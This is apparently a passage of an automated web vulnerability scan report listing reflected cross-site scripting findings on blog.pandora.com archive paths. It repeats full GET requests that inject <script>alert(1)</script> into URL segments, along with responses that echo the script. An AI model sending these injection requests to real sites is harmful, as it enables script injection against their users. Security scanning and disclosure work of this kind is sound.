Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ was not found on this server.</p>
...[SNIP]...

3.350. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/louisiana/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)</script>14a7a2da08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ was not found on this server.</p>
...[SNIP]...

3.351. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maine/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)</script>1648ab9c938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ was not found on this server.</p>
...[SNIP]...

3.352. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maine/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a36c6<script>alert(1)</script>9fa19fe371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ was not found on this server.</p>
...[SNIP]...

3.353. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maine/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32ddc<script>alert(1)</script>3ce6ddf7419 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ was not found on this server.</p>
...[SNIP]...

3.354. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maryland/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b372a<script>alert(1)</script>0ef2d728dc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ was not found on this server.</p>
...[SNIP]...

3.355. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maryland/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35554<script>alert(1)</script>d313a9d9657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ was not found on this server.</p>
...[SNIP]...

3.356. http://blog.pandora.com/pandora/archives/maryland/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/maryland/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload efc2f<script>alert(1)</script>d3dbd7d1589 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ was not found on this server.</p>
...[SNIP]...

3.357. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/massachusetts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 682e0<script>alert(1)</script>d4489f6734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ was not found on this server.</p>
...[SNIP]...

3.358. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/massachusetts/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c214<script>alert(1)</script>b8b28cef3de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ was not found on this server.</p>
...[SNIP]...

3.359. http://blog.pandora.com/pandora/archives/massachusetts/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/massachusetts/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40eea<script>alert(1)</script>4daafa849f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ was not found on this server.</p>
...[SNIP]...

3.360. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/michigan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ee6f<script>alert(1)</script>47d2dc5e8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ was not found on this server.</p>
...[SNIP]...

3.361. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/michigan/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947a8<script>alert(1)</script>db5c6120320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ was not found on this server.</p>
...[SNIP]...

3.362. http://blog.pandora.com/pandora/archives/michigan/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/michigan/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>31ac4934856 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ was not found on this server.</p>
...[SNIP]...

3.363. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/minnesota/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8487c<script>alert(1)</script>81afb429dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 351
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ was not found on this server.</p>
...[SNIP]...

3.364. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/minnesota/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0986<script>alert(1)</script>4df760a3378 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ was not found on this server.</p>
...[SNIP]...

3.365. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/minnesota/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a5b3<script>alert(1)</script>d9de8f83c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ was not found on this server.</p>
...[SNIP]...

3.366. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/mississippi/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5c1c<script>alert(1)</script>f85b07012ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
